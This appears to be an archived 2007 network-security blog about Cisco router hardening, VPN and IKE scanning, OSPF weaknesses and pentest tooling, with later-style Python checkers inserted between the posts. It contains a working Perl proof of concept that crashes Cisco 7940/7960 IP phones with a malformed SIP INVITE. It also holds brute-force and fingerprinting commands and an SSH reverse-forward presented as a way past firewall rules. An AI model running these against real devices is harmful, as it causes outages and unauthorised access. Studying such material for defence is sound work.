Ending ike-scan 1.9: 1 hosts scanned in 2.468 seconds (0.41 hosts/sec). 0 returned handshake; 0 returned notify

C:\ikescan>ike-scan -multiline -sport=0 --trans=5,2,1,2 --aggressive xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.468 seconds (0.41 hosts/sec). 0 returned handshake; 0 returned notify

C:\ikescan>ike-scan -multiline -sport=0 --trans=5,2,1,2 --aggressive xx.xx.xx.xx 443

As you can see, the list goes on and on. In the last example, highlighted in black, I specify the port to check if the VPN is running on port 443. I know Nortel can have VPN gateways running on SSL. The above results are from a Nortel VPN Gateway.

If you find a gateway that answers, the response looks like the one below. A returned Main Mode handshake means the gateway accepted the proposed transform, here single DES with MD5, DH group 2 and pre-shared-key authentication, which are weak choices; on its own it tells you the gateway is reachable and what it will negotiate, not yet that it is exploitable:

C:\ikescan>ike-scan -v -s 0 xx.xx.xx.xx
Starting ike-scan 1.8 with 1 hosts (http://www.nta-monitor.com/ike-scan/)
xx.xx.xx.xx Main Mode Handshake returned HDR=(CKY-R=fb07f15c64c1fef9) SA=(Enc=DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

Ending ike-scan 1.8: 1 hosts scanned in 0.114 seconds (8.77 hosts/sec). 1 returned handshake; 0 returned notify

--------------------------------------------------------------------------------------------------


C:\ikeprobe>ikeprobe xx.xx.xx.xx
IKEProbe 0.1beta (c) 2003 Michael Thumann (www.ernw.de)
Portions Copyright (c) 2003 Cipherica Labs (www.cipherica.com)
Read license-cipherica.txt for LibIKE License Information
IKE Aggressive Mode PSK Vulnerability Scanner (Bugtraq ID 7423)

Supported Attributes
Ciphers : DES, 3DES, AES-128, CAST
Hashes : MD5, SHA1
Diffie Hellman Groups: DH Groups 1,2 and 5

IKE Proposal for Peer: xx.xx.xx.xx
Aggressive Mode activated ...

Attribute Settings:
Cipher DES
Hash SHA1
Diffie Hellman Group 1

0.000 3: ph1_initiated(00443ee0, 003b4760)
0.016 3: << ph1 (00443ee0, 244)
0.016 3: >> 84
0.016 3: sx_recv_notify: error 14
0.016 3: sx_purge_spi: implement me - 0
2.516 3: << ph1 (00443ee0, 244)
2.516 3: >> 84
2.516 3: sx_recv_notify: error 14
2.516 3: sx_purge_spi: implement me - 0
5.531 3: << ph1 (00443ee0, 244)
16.047 3: >> 84
16.047 3: sx_recv_notify: error 14
16.047 3: sx_purge_spi: implement me - 0
19.547 3: ph1_disposed(00443ee0)

Attribute Settings:
Cipher DES
Hash SHA1
Diffie Hellman Group 2

19.547 3: ph1_initiated(00443ee0, 003b4c08)
19.578 3: << ph1 (00443ee0, 276)
19.578 3: >> 437
19.625 3: ph1_get_psk(00443ee0)

*****************************************************************************
* System is vulnerable!! See http://www.securityfocus/bid/7423/ for details *
*****************************************************************************

Tuesday, March 27, 2007

VLAN Trunking Protocol configurations

Ok, here is my next installment, configuring VTP. VTP works like this: you configure VLANs on one switch and that information is propagated in VTP advertisements to the other switches in the same VTP domain. As you know, VLAN hopping attacks are possible when Dynamic Trunking Protocol is left enabled, so in my configuration I manually configure the trunk instead of using DTP, as shown in my example with the command "switchport mode trunk" (add "switchport nonegotiate" to stop the port from sending DTP frames altogether). In my configuration I had also set a VTP password for protection. Lastly, the VTP domain name must be set consistently on the switches, otherwise advertisements from the other switches will not be accepted. For a more detailed explanation and configuration samples, please visit this link:

http://www.cisco.com/warp/public/473/21.html

Monday, March 26, 2007

The Tipping Point

I have been reading a lot of the book "The Tipping Point" by Malcolm Gladwell. For those of you who are inspired to accomplish big things in life, you should read this amazing book. It illustrates how small things in life can spread rapidly throughout the world and can be considered epidemics. For those who love marketing or are starting to build a brand for yourself, this is absolutely the book for you. An excerpt from the book in chapter 2:

" Epidemics have three primary characteristics:

1) contagiousness
2) rapid change
3) very importantly, small changes can have big effects

The "Tipping Point" is the moment of critical mass when rapid change occurs.

When an Epidemic Tips, it tips because of a change in one of the follow:

The Law of the Few - social epidemics are driven by the efforts of a talented few. Gladwell characterizes them as: Connectors - people specialists who know many people, Mavens - information specialists who love to spread information, and Salesmen - persuasion experts. It turns out I am not one of these few :)

Stickiness Factor - does the message make a significant impact? Small but critical changes to a message can radically affect its stickiness. The quality of the message is not the issue.

Power of Context - humans are incredible sensitive to context. For example, removing graffiti and subway fare cheaters substantially reduced serious crime in New York City subways."

sla.ckers

Ok, I just got a message from RSnake giving me permission to use his banner. RSnake is one of the top web application gods in the web application industry today. I am a huge fan of his and constantly visit his forum and blog to gain new insights and information. Recently, people from the sla.ckers forum designed a cool banner to be used in the forum, and since I am one of his fans, I got to blog his banner down here. Feel free to visit the sla.ckers here:

http://sla.ckers.org/forum The lights you see in the banner is where all the ha.ckers are at work :)



Rsnake, how about a banner for Jeremiah? :)

Sunday, March 25, 2007

Cisco IOS Authentication Proxy Vulnerability

Ok, so the Cisco IOS authentication proxy is also vulnerable to a remotely exploitable buffer overflow. This only affects devices configured for the Telnet or FTP authentication proxy. Fixes, mitigations and workarounds have been published here:

http://www.cisco.com/warp/public/707/cisco-sa-20050907-auth_proxy.shtml

CBAC vulnerabilities

Ok, last night I blogged about CBAC and its powerful features. It is really a useful feature to have in your firewall, and a sample configuration was included in that post. I only included a small snippet of the configuration, but there is more to it; if you explore deeper, you will find additional CBAC features. The sad thing is that older IOS versions using CBAC suffer from DoS attacks involving fragmented IP packets (you can use hping to generate the fragments), so please patch your IOS. More information can be found here:

http://www.cisco.com/warp/public/770/nifrag.shtml

Unfortunately, CBAC also suffers from another vulnerability, which allows traffic that should be denied to pass through the dynamic ACL. More can be found here:

http://www.cisco.com/warp/public/707/IOS-cbac-dynacl-pub.shtml

Boosting Linksys Router Signal

Ok, I happened to stumble across this site, http://www.thibor.co.uk/, where you can upgrade your Linksys router firmware to enhance its signal strength, that is, without new antennas or range boosters. Sadly, they only support a few Linksys router models, and mine is not on their list :(

More support for linksys products can be found here: http://www.linksysinfo.org/index.php

IP NAT Pool

Ok, last night I did a small configuration for NATing. I guess most networkers know what NAT is used for, so the configuration is shown below. In this example you will see the serial interface is down. The reason is simply that I set the interface to a private IP range instead of a public one. As for the other commands, they are pretty simple. This is just a basic NAT configuration.

Saturday, March 24, 2007

Other Cisco Security Router features.

Alright, the other day I provided a list of features that can be used to harden a Cisco router, and I am going to finish it here today with the commands.
For PAM to work, you can issue the commands below:

config t
ip port-map smtp port 2525
exit


This tells the inspection engine (CBAC) that SMTP, normally on port 25, is also spoken on the non-standard port 2525, so that ip inspect rules written for smtp apply to that port too. You can restrict the mapping to specific hosts by appending list xx (where xx is a standard access-list number) to the ip port-map command, for example ip port-map smtp port 2525 list 10.


Cisco IOS Firewall ships with a basic set of IDS signatures by default. However, you can always add more signatures and advanced configuration settings to thwart attacks. For IPS and IDS configuration, refer to the link below for a detailed step-by-step explanation:

http://www.cisco.com/en/US/products/sw/iosswrel/ps1835/products_configuration_guide_chapter09186a00800ca7c6.html


Setting up an authentication proxy on the Cisco router using TACACS+. This requires users to authenticate (on a login page served by the router itself) before their HTTP traffic is allowed out to the internet.

config t
aaa new-model
! login authentication and auth-proxy authorization both go to the TACACS+ server
aaa authentication login default group tacacs+
aaa authorization auth-proxy default group tacacs+
tacacs-server host 192.168.1.4
! "cisco" is a placeholder; use a long random shared secret in production
tacacs-server key cisco
! the router's HTTP server must be enabled and use AAA for the auth-proxy login page
ip http server
ip http authentication aaa
ip auth-proxy name httpAuthentication http
interface Ethernet0/1
ip auth-proxy httpAuthentication
exit


Use show ip auth-proxy cache to see the current authentication cache entries (which hosts have authenticated and when their entries expire). A sample can be found below:

http://www.cisco.com/en/US/products/sw/secursw/ps1018/products_configuration_example09186a008009466e.shtml

Transparent Layer 2 Firewall

Ok, I have to blog this. Personally I have not configured a Layer 2 transparent firewall on a Cisco router, but it seems an interesting, useful and powerful feature to me. I never knew that modern Cisco routers have Layer 2 firewall capabilities until this very moment. A transparent firewall works similarly to a Layer 3 firewall except that it is invisible to the hosts on either side and requires bridging to be configured. Both Integrated Routing and Bridging (IRB) and a Bridge Virtual Interface (BVI) need to be configured for it to work.

" A transparent Cisco IOS firewall acts as a Layer 2 transparent bridge with context-based access control (CBAC) and ACLs configured on the bridged interface."

So transparent firewalling works in combination with CBAC too, which provides even more stringent security on the bridged interfaces. On the same router I can have both Layer 2 and Layer 3 firewalling running at the same time, with IRB providing Layer 2 bridging between interfaces and the BVI providing Layer 3 routing of packets. A detailed step-by-step configuration and explanation can be found here:

http://www.cisco.com/univercd/cc/td/doc/product/software/ios123/123newft/123t/123t_7/gt_trans.htm

I am looking forward to configuring a Layer 2 transparent firewall one of these days :)

CBAC configuration example

The other day I was blogging about Cisco's CBAC feature, which can be used as an application firewall to monitor application layer protocols. Since it only creates session table entries for outbound traffic and blocks inbound traffic, this feature also blocks port scanning, a common technique used by hackers. If someone tries to port scan using nmap or some other tool, because this feature is blocking inbound connections, the port scan yields nothing useful, thus protecting the servers and shielding off most hackers. Below is a basic CBAC configuration example.

config t
! inbound: deny everything; CBAC adds temporary entries for return traffic of inspected sessions
access-list 123 deny ip any any
! outbound: only SMTP may leave
access-list 129 permit tcp any any eq smtp
! inspection rule named "smtp", generic TCP session tracking
ip inspect name smtp tcp
interface Serial0/0
ip access-group 123 in
ip access-group 129 out
ip inspect smtp out
exit


Issue show ip inspect all to see all configured rules, or show ip inspect sessions to see CBAC in action on the current sessions.

And you can read more at the following links:

http://www.ciscopress.com/articles/article.asp?p=26533&seqNum=5&rl=1 (configuration step by step)

http://www.cisco.com/univercd/cc/td/doc/product/software/ios120/120newft/120t/120t1/fw3600.htm (sample scenario)

http://www.cisco.com/en/US/products/sw/secursw/ps1018/products_configuration_example09186a008064730a.shtml (simple example)

http://www.ciscopress.com/articles/article.asp?p=26533&rl=1 (CBAC to protect DoS)

Friday, March 23, 2007

Cisco to develop its own mobile handhelds

Ok, today i was wondering about Cisco developing its own handhelds to compete against mobile giants like Nokia, Siemens and a few others. Microsoft has its own handheld and OS, Apple is about to launch iphone, but what if Cisco starts developing its own handhelds. Personally, i think they have a huge edge in the handheld market. Cisco is the product leader in networking and if they really do develop handhelds, it will be interesting to see many cutting edge features incorporated to the existing technology. Let me know what you think.
Just a thought.

OSPF Attacks

Last night I tried to play around with a very basic OSPF configuration and the below depicts my config. It's the simplest form of OSPF configuration, without any authentication.



The other night I was talking about OSPF and how this protocol divulges a lot of information to anyone sniffing a network that uses OSPF. If you have physical access to the router, you could also issue commands like show ip ospf, show ip ospf database and the other show ip ospf commands.

OSPF HELLO packets are sent every 10-30 seconds and routing updates are sent every 30 minutes. The hello packets are the ones with the most juicy info: Router ID, Area ID, Designated Router, Authentication, etc. Well, so far I only know that injection of malicious routes and Man-in-the-Middle attacks are possible. Once a neighbor relationship is successfully established with the DR and BDR, all traffic can be directed to the newly inserted route in preference to all other routes. For more reference on how this can be done, please see below:

http://www.gomor.org/cgi-bin/ospfash.pl?mode=view;page=it_underground_2007
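The hello fields listed above can be checked on the wire. As an added example (my code, not part of the original post), the following Python builds a constructed OSPFv2 Hello, parses it and flags a null or simple-password AuType, which is how a defender spots from a capture that anyone on the segment could form an adjacency. The packet layout follows RFC 2328; all addresses are made up.

```python
import socket
import struct
from dataclasses import dataclass, field
from typing import List

OSPF_VERSION = 2
OSPF_HELLO = 1


@dataclass
class OspfHello:
    router_id: str
    area_id: str
    au_type: int          # 0 null, 1 simple password, 2 cryptographic (MD5)
    hello_interval: int
    dead_interval: int
    priority: int
    dr: str
    bdr: str
    neighbors: List[str] = field(default_factory=list)


def ospf_checksum(pkt: bytes) -> int:
    """RFC 2328 A.3.1: IP-style one's-complement checksum over the whole packet,
    excluding the 8-byte authentication field (header bytes 16..23)."""
    data = pkt[:16] + pkt[24:]
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_hello(router_id, area_id, au_type, neighbors=(), dr="0.0.0.0",
                bdr="0.0.0.0", mask="255.255.255.0", hello=10, dead=40, priority=1):
    """Constructed test Hello (addresses are made up), laid out per RFC 2328 A.3.2."""
    body = socket.inet_aton(mask) + struct.pack("!HBBI", hello, 0x02, priority, dead)
    body += socket.inet_aton(dr) + socket.inet_aton(bdr)
    body += b"".join(socket.inet_aton(n) for n in neighbors)
    hdr = struct.pack("!BBH", OSPF_VERSION, OSPF_HELLO, 24 + len(body))
    hdr += socket.inet_aton(router_id) + socket.inet_aton(area_id)
    hdr += struct.pack("!HH", 0, au_type) + bytes(8)   # checksum 0 for now, empty auth field
    pkt = hdr + body
    return pkt[:12] + struct.pack("!H", ospf_checksum(pkt)) + pkt[14:]


def parse_hello(pkt: bytes) -> OspfHello:
    """Decode one OSPFv2 Hello; raises ValueError on anything malformed."""
    if len(pkt) < 44:
        raise ValueError("truncated OSPF packet")
    version, ptype, length = struct.unpack("!BBH", pkt[:4])
    if version != OSPF_VERSION or ptype != OSPF_HELLO:
        raise ValueError("not an OSPFv2 Hello")
    if length != len(pkt) or (length - 44) % 4:
        raise ValueError("length field does not match packet")
    au_type = struct.unpack("!H", pkt[14:16])[0]
    # With cryptographic authentication the checksum field is unused (RFC 2328 D.4.3).
    if au_type != 2 and ospf_checksum(pkt) != 0:
        raise ValueError("bad OSPF checksum")
    hello, _options, prio, dead = struct.unpack("!HBBI", pkt[28:36])
    ip = socket.inet_ntoa
    return OspfHello(ip(pkt[4:8]), ip(pkt[8:12]), au_type, hello, dead, prio,
                     ip(pkt[36:40]), ip(pkt[40:44]),
                     [ip(pkt[i:i + 4]) for i in range(44, length, 4)])


def is_valid_hello(pkt: bytes) -> bool:
    try:
        parse_hello(pkt)
        return True
    except ValueError:
        return False


def audit_hello(h: OspfHello) -> List[str]:
    """Defender-side findings for one Hello seen on the segment."""
    where = f"router {h.router_id} in area {h.area_id}"
    if h.au_type == 0:
        return [f"{where}: AuType null, any host on the segment can form an adjacency"]
    if h.au_type == 1:
        return [f"{where}: simple-password auth, the key crosses the wire in cleartext"]
    return []


if __name__ == "__main__":
    pkt = build_hello("1.1.1.1", "0.0.0.0", 0, neighbors=["2.2.2.2"], dr="192.168.1.1")
    hello = parse_hello(pkt)
    print(hello)
    for finding in audit_hello(hello):
        print("FINDING:", finding)
```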

Hydra and Cisco Torch

Ok, tried dictionary attacks, brute forcing and fingerprinting a Cisco router today. The tools used are THC Hydra and Cisco Torch. The password is hard to guess, which is why neither Hydra nor Cisco Torch could pick it up. I must admit that Hydra is such a wonderful tool to have; it's fast and wastes no time. On the other hand Cisco Torch is slower, but still gets the job done. p0f is a tool used for passive and active fingerprinting. I would love to use a third tool (SinFP) to actually double-verify the IOS version and the device running. Unfortunately, SinFP crashed on my machine and I did not probe further.

Well, the commands for the tools are:

Nmap: nmap -sV -A -P0 -O -vvv -sS 127.0.0.1

hydra: I prefer to use the GTK front end

p0f: Because I did passive fingerprinting, I actually saved a pcap file first using Wireshark and then ran p0f over it. So the command is:
p0f -s cisco.pcap -V -A
The -A is to actually look at the SYN/ACK packets returned by the router.

SinFP: sinfp.pl -ai 127.0.0.1 -p 23

Cisco torch: ./cisco-torch.pl -t -b 127.0.0.1

I am going to write a methodology on enumerating VoIP soon, so stay tuned.

Wednesday, March 21, 2007

Cisco IP Phone 7940/7960 vulnerable to DoS

Ok, this is bad. The Cisco IP Phone 7940/7960 is vulnerable to DoS. After sending a malformed, crafted SIP INVITE message, you can cause the IP phone to reboot. This is due to the phone lacking any check of the validity of the sipURI field of the remote party. This affects the Cisco IP Phone 7940/7960 running firmware P0S3-07-4-00.

Unaffected firmware: POS8-6-0



Ok, so i am not vulnerable. :)

Proof of Concept:

#!/usr/bin/perl
# Sends one crafted SIP INVITE over UDP; the malformed sipURI in the
# Remote-Party-ID header is what triggers the reboot described above.
use strict;
use warnings;
use IO::Socket::INET;

die "Usage $0 " unless ($ARGV[2]);

my $socket = IO::Socket::INET->new(PeerPort => $ARGV[1],
                                   Proto    => 'udp',
                                   PeerAddr => $ARGV[0]);

my $msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\n" .
          "Via: SIP/2.0/UDP 192.168.1.2;branch=z9hG4jk\r\n" .
          "From: sip:chirimolla\@192.168.1.2;tag=qwzng\r\n" .
          "To: \r\n" .
          "Call-ID: fosforito\@192.168.1.1\r\n" .
          "CSeq: 921 INVITE\r\n" .
          "Remote-Party-ID: csip:7940-1\@192.168.\xd1.7\r\n\r\n";

$socket->send($msg);

#end
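The defect above is a phone that uses the Remote-Party-ID sipURI without ever validating it. As an added example (my code, not the advisory's or Cisco's), this Python shows the check a SIP stack should make before trusting that field: it parses an INVITE, pulls the URI out of every URI-bearing header and rejects one whose scheme, user part or host is malformed. Both sample messages are constructed; only the Remote-Party-ID value mirrors the advisory's trigger.

```python
import ipaddress
import re
from typing import Dict, List, Optional, Tuple

URI_HEADERS = ("From", "To", "Contact", "Remote-Party-ID")

# Hostname labels per RFC 1123; user characters per RFC 3261 unreserved + user-unreserved.
_HOSTNAME = re.compile(r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
                       r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")
_USER = re.compile(r"^[A-Za-z0-9\-_.!~*'()&=+$,;?/%:]+$")
_URI = re.compile(r"^(sips?):(?:([^@]+)@)?(\[[^\]]*\]|[^;?:\[\]]+)(?::(\d+))?(?:;[^?]*)?(?:\?.*)?$")


class SipUriError(ValueError):
    pass


def _valid_host(host: str) -> bool:
    if host.startswith("[") and host.endswith("]"):          # IPv6 reference
        try:
            ipaddress.IPv6Address(host[1:-1])
            return True
        except ValueError:
            return False
    if re.fullmatch(r"\d+(?:\.\d+){3}", host):                 # dotted form must be a real IPv4
        try:
            ipaddress.IPv4Address(host)
            return True
        except ValueError:
            return False
    return _HOSTNAME.match(host) is not None


def validate_sip_uri(uri: str) -> Tuple[str, Optional[str], str]:
    """Return (scheme, user, host) for a well-formed sip:/sips: URI, else raise SipUriError."""
    if not uri.isascii():
        raise SipUriError("non-ASCII byte in URI")
    m = _URI.match(uri)
    if not m:
        raise SipUriError("not a sip:/sips: URI")
    scheme, user, host, port = m.groups()
    if user is not None and not _USER.match(user):
        raise SipUriError("illegal character in user part")
    if not _valid_host(host):
        raise SipUriError(f"malformed host {host!r}")
    if port is not None and not 1 <= int(port) <= 65535:
        raise SipUriError("port out of range")
    return scheme, user, host


def _addr_spec(value: str) -> str:
    """name-addr ("Name" <uri>;params) or bare addr-spec (uri;params) -> uri."""
    m = re.search(r"<([^>]*)>", value)
    return m.group(1) if m else value.split(";", 1)[0].strip()


def parse_request(raw: bytes) -> Tuple[str, Dict[str, str]]:
    """Split a SIP request into request-line and a lowercase-keyed header dict.
    latin-1 keeps every byte, so a stray high byte survives into the URI check."""
    head = raw.decode("latin-1").partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def check_invite(raw: bytes) -> List[str]:
    """Problems found in the URI-bearing fields; an empty list means the message may be used."""
    problems: List[str] = []
    request_line, headers = parse_request(raw)
    parts = request_line.split(" ")
    if len(parts) != 3 or parts[2] != "SIP/2.0":
        problems.append("malformed request line")
    else:
        try:
            validate_sip_uri(parts[1])
        except SipUriError as e:
            problems.append(f"Request-URI: {e}")
    for name in URI_HEADERS:
        value = headers.get(name.lower())
        if value is None:
            continue
        try:
            validate_sip_uri(_addr_spec(value))
        except SipUriError as e:
            problems.append(f"{name}: {e}")
    return problems


# Constructed sample traffic; only the Remote-Party-ID value mirrors the advisory's trigger.
COMMON = (b"INVITE sip:1001@192.168.1.10 SIP/2.0\r\n"
          b"Via: SIP/2.0/UDP 192.168.1.2;branch=z9hG4bK776\r\n"
          b"From: <sip:caller@192.168.1.2>;tag=1928301774\r\n"
          b"To: <sip:1001@192.168.1.10>\r\n"
          b"Call-ID: a84b4c76e66710\r\nCSeq: 1 INVITE\r\n")
MALFORMED_INVITE = COMMON + b"Remote-Party-ID: csip:7940-1@192.168.\xd1.7\r\n\r\n"
CLEAN_INVITE = COMMON + b"Remote-Party-ID: <sip:7940-1@192.168.1.7>;party=calling\r\n\r\n"

if __name__ == "__main__":
    for label, msg in (("malformed", MALFORMED_INVITE), ("clean", CLEAN_INVITE)):
        print(label, check_invite(msg) or "accepted")
```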

No 1 in google

Ok, i finally made it after 2 months of blogging. My blog has been googled up as no 1. Great thanks to Jeremiah Grossman for this one, he gave me the best advice. I am still pentesting the Telecom as of writing now. I found a lot of interesting things. I even found UDP port 5060 running which is SIP. I am still performing enumeration on this port as it might be false positive after all. Will let you all know soon. Stay tuned.

Tuesday, March 20, 2007

SSH Dynamic and Reverse port forwarding

Dynamic Port Forwarding
Ok, I know some of you guys already know how to use dynamic port forwarding and reverse port forwarding. For those who don't, this is it. Dynamic port forwarding is very useful in this country, which blocks a lot of websites. So in order to bypass that, I use dynamic port forwarding. This actually passes all traffic over the SSH tunnel, which is also secure because of the encryption, but be prepared to experience slower speeds. The application must support SOCKS5 to use dynamic port forwarding. Below is a simple diagram: in the first line, a user connects straight to the internet; in the second, all traffic passes through an SSH tunnel and is encrypted before reaching the destination.

User -------------> Internet

User --------> SSH tunnel ----------> Internet

The command to do so at the SSH server is: ssh -D 1080 user@remoteserver.com

Open a browser or any application which supports SOCKS5, enter the settings as shown below.



Close the browser and try to surf. There you go, all HTTP traffic is encrypted over an SSH tunnel. So if someone is sniffing the traffic, all he sees is encrypted gibberish.


Reverse Port Forwarding

Reverse port forwarding is like a remote shell. This technique actually allows you to bypass firewall rules. If a firewall is blocking inbound access on port 22 (SSH), you can set up a port on the SSH server which is behind the firewall and reconnect to it as and when you need it. This is known as reverse port forwarding.

On the SSH Server, type: ssh -R 1080:localhost:22 user@your-home-external-ip.com

When you reach home, you type this on your client: ssh -p 1080 user@localhost

Advanced Cisco Router Security

Ok, I have to speak a little bit about advanced Cisco router security settings. I have been configuring Cisco devices since 2002 and when I looked back, I realised that my configuration is not secure at all. There are so many loopholes hanging around here and there. If an attacker were to use a port scanner, he would actually be able to see all the open ports and services present on the router. That's a bad, bad configuration by me. Well, every man makes mistakes and learns from there onwards. It's 2007 and well, I have learnt my mistakes the hard way, so here is the improved sample configuration from me. However, please note that they are not in order.

1. Practice logging. There are a lot of ways to perform logging. You can use AAA, syslog and system logging, which includes console and vty logins.

2. Use an authentication proxy if required. If you have an internal server which requires login, you can set up an authentication proxy to make sure users authenticate with the router first before their traffic is allowed to the server. Make sure you set up either a local database or an AAA server for verification of user credentials. This will depend on each organization.

3. Disable unnecessary services. This point is very important. Never allow services like finger, telnet or SNMP if not required. Multiple exploits have been published that can actually compromise the router. So, review your router, check for unwanted services and shut them down.

4. Restrict access. Restrict access like VTY, console, SSH, telnet, etc. I will not say much about this as it is covered with configuration examples in my earlier post.

5. Use auto secure. You can use the auto secure command in IOS version 12.3 onwards to actually implement router security. This command will let you disable CDP and finger if not needed. Use this command if you do not know how to configure it manually.

6. Enable the IPS in your router. Modern Cisco routers come with IPS included in the IOS. Enable it. With IPS enabled, you can log the specific event to a server, drop the packets, or forward them to the destination with the reset bit set, if your configuration decides that this is an attack.

7. Use CBAC. This feature allows monitoring of layer 7 protocols like HTTP and FTP. It will actually create a session table entry for any connection that an internal user initiates to the outside world. CBAC can detect unusual behaviour and drop the connection.

8. Use port-to-address mapping (PAM). Use this feature to map known services to a different port. For example, HTTP runs on port 80; you can actually map it to port 9090. This feature blends well with CBAC.

Pentesting

Ok, so I did passive fingerprinting last night. Today is the day I am going to perform an external pentest. Quite frankly, pentesting gets a little boring for me these days. If I had the chance, I would love to try black-box pentesting in a Cisco network environment. I will see what I can find during these 5 days and will blog about it if I find something interesting. Nmap is always the first step in an external pentest and yep, I am going to use the same technique discussed earlier. Once this is all set and done, I will try to come back to Cisco, which is my favourite. Stay tuned for more.

Monday, March 19, 2007

Top IT bloggers

Ok, now i might not be in one of the top IT bloggers, but definitely, one day i will reach there. Jeremiah Grossman, Bruce Schneier and some other greats are this year's top bloggers. Well, check out this article below:

http://www.itsecurity.com/features/top-59-influencers-itsecurity-031407/

Let me know what you think.

Cisco PIX/ASA Privilege Escalation.

Ok, a vulnerability has been discovered which allows privilege escalation in Cisco PIX/ASA Firewall IOS ver 7.2.x to 7.2(2.8). If you are using LOCAL as your local aaa authentication, please change it to radius or Cisco proprietary TACACS+ like,

cisco(config)#aaa authentication login default LOCAL

change it to:

cisco(config)#aaa authentication login default TACACS+ or radius,

I am not so sure about the configuration for TACACS and radius now, as i need to refer but basically, do not use LOCAL if you are using the affected IOS version as mentioned above.

Also, for this exploit to work correctly, a user with privilege level of 0 must be present in the LOCAL database of the PIX/ASA. A user with privilege level of 0 can be escalated to privilege level 15 which is the super privilege level with admin access. So in order to stop this exploit, change the following:

cisco(config)#username cisco privilege 0 password cisco

to

cisco(config)#username cisco privilege 1 password cisco

This change will actually stop this exploit.

You can use show version to see your IOS version.
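To make the router hardening checklist from the earlier post and the privilege-0 point above something you can actually check, here is an added example (my code, not a Cisco tool) that audits a text copy of a running-config for those items: a logging destination, finger/SNMP/telnet/CDP left on, vty lines without an access-class, no IPS or CBAC rule, local users at privilege 0, and LOCAL login authentication. Both configs are constructed; the command syntax is IOS-style, and the username line is the same form as the PIX/ASA line above.

```python
import re
from typing import List, Tuple

# Constructed sample configs, not taken from any real device.
WEAK_CONFIG = """\
hostname edge-rtr
aaa new-model
aaa authentication login default LOCAL
username cisco privilege 0 password cisco
username ops privilege 1 secret 5 $1$placeholder
ip finger
snmp-server community public RO
ip inspect name fw tcp
line vty 0 4
 transport input telnet
 login local
"""

HARDENED_CONFIG = """\
hostname edge-rtr
no cdp run
aaa new-model
aaa authentication login default group tacacs+
username ops privilege 1 secret 5 $1$placeholder
logging host 192.0.2.50
ip ips name iosips
ip inspect name fw tcp
line vty 0 4
 access-class 10 in
 transport input ssh
 login authentication default
"""


def parse_config(text: str) -> List[Tuple[str, List[str]]]:
    """Group an IOS-style config into (top-level command, indented sub-commands) pairs."""
    blocks: List[Tuple[str, List[str]]] = []
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("!"):
            continue
        if raw[0] in " \t" and blocks:
            blocks[-1][1].append(raw.strip())
        else:
            blocks.append((raw.strip(), []))
    return blocks


def audit_config(text: str) -> List[str]:
    """One finding per checklist item the config fails; an empty list means clean."""
    blocks = parse_config(text)
    top = [cmd for cmd, _ in blocks]
    findings: List[str] = []

    def has(pattern: str) -> bool:
        return any(re.match(pattern, c) for c in top)

    # 1. logging: a syslog host or at least the local buffer
    if not has(r"logging (host |buffered|\d)"):
        findings.append("no logging destination (logging host / logging buffered)")
    # 3. unnecessary services: finger, SNMP; 5. auto secure would also turn CDP off
    if has(r"(ip|service) finger"):
        findings.append("finger enabled: add 'no ip finger'")
    for c in top:
        m = re.match(r"snmp-server community (\S+)", c)
        if m:
            findings.append(f"SNMP community '{m.group(1)}' set; remove if SNMP is not needed")
    if not has(r"no cdp run"):
        findings.append("CDP running globally: add 'no cdp run'")
    # 4. restrict access on every vty line: no telnet, sources limited by an access-class
    for cmd, sub in blocks:
        if cmd.startswith("line vty"):
            if any(re.match(r"transport input (telnet|all)", s) for s in sub):
                findings.append(f"{cmd}: telnet allowed; use 'transport input ssh'")
            if not any(s.startswith("access-class") for s in sub):
                findings.append(f"{cmd}: no access-class limiting management sources")
    # 6. IPS and 7. CBAC rules present
    if not has(r"ip ips name"):
        findings.append("no IOS IPS rule (ip ips name ...)")
    if not has(r"ip inspect name"):
        findings.append("no CBAC inspection rule (ip inspect name ...)")
    # PIX/ASA 7.2 privilege escalation preconditions: a privilege-0 user and LOCAL login auth
    for c in top:
        m = re.match(r"username (\S+) .*\bprivilege 0\b", c)
        if m:
            findings.append(f"user '{m.group(1)}' at privilege 0: change to 'privilege 1'")
    if has(r"aaa authentication login default LOCAL\b"):
        findings.append("LOCAL login authentication; use TACACS+ or RADIUS on affected PIX/ASA releases")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"== {name}: {len(audit_config(cfg))} finding(s)")
        for finding in audit_config(cfg):
            print("  -", finding)
```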

Detecting Cisco Routers

Ok, it's easy to detect Cisco routers and there is no doubt about it. Traceroute is a utility to discover the routers and firewalls and I shan't go deep into it. If telnet is open after performing a port scan, just telnet to the IP address and look at the banner; it will say something like "User Access Verification". And there you go, you just discovered a Cisco router or core switch on the internet. Well, that's easy.

Port scanners are one of the best tools to discover open ports. A vulnerable Cisco router with default settings will have many ports open. It just takes one vulnerable open port to actually bring the router down. Well, I shan't go too deep on that either. The best port scanners out there that would perform the job are nmap, unicornscan, hping, sinfp, p0f, xprobe and many others. Do not use these tools to scan networks without permission. Well, I have been performing pentests for the past 4 years and today I managed to capture screenshots of port scanning my servers.

If you ever find a cisco product and had permission to scan, you can try to use the switches as seen on the screenshots.



Above shows nmap scans on a server. Observe the switches. Of course there are many more switches; these are the ones I normally use.




Above shows the hping scans; notice that the S..A flags are returned. If you know the TCP/IP three-way handshake, this indicates that the ports are open. Personally, I like using hping; it is a powerful low-level TCP/IP tool.








The above shows unicornscan, another powerful scanner. This scanner can be used to scan large networks and can be used to perform DoS. In addition, it is also very, very fast. I have attached the results below. There are also tools like sinfp, p0f and xprobe; I shan't mention too much here, you can search for them.


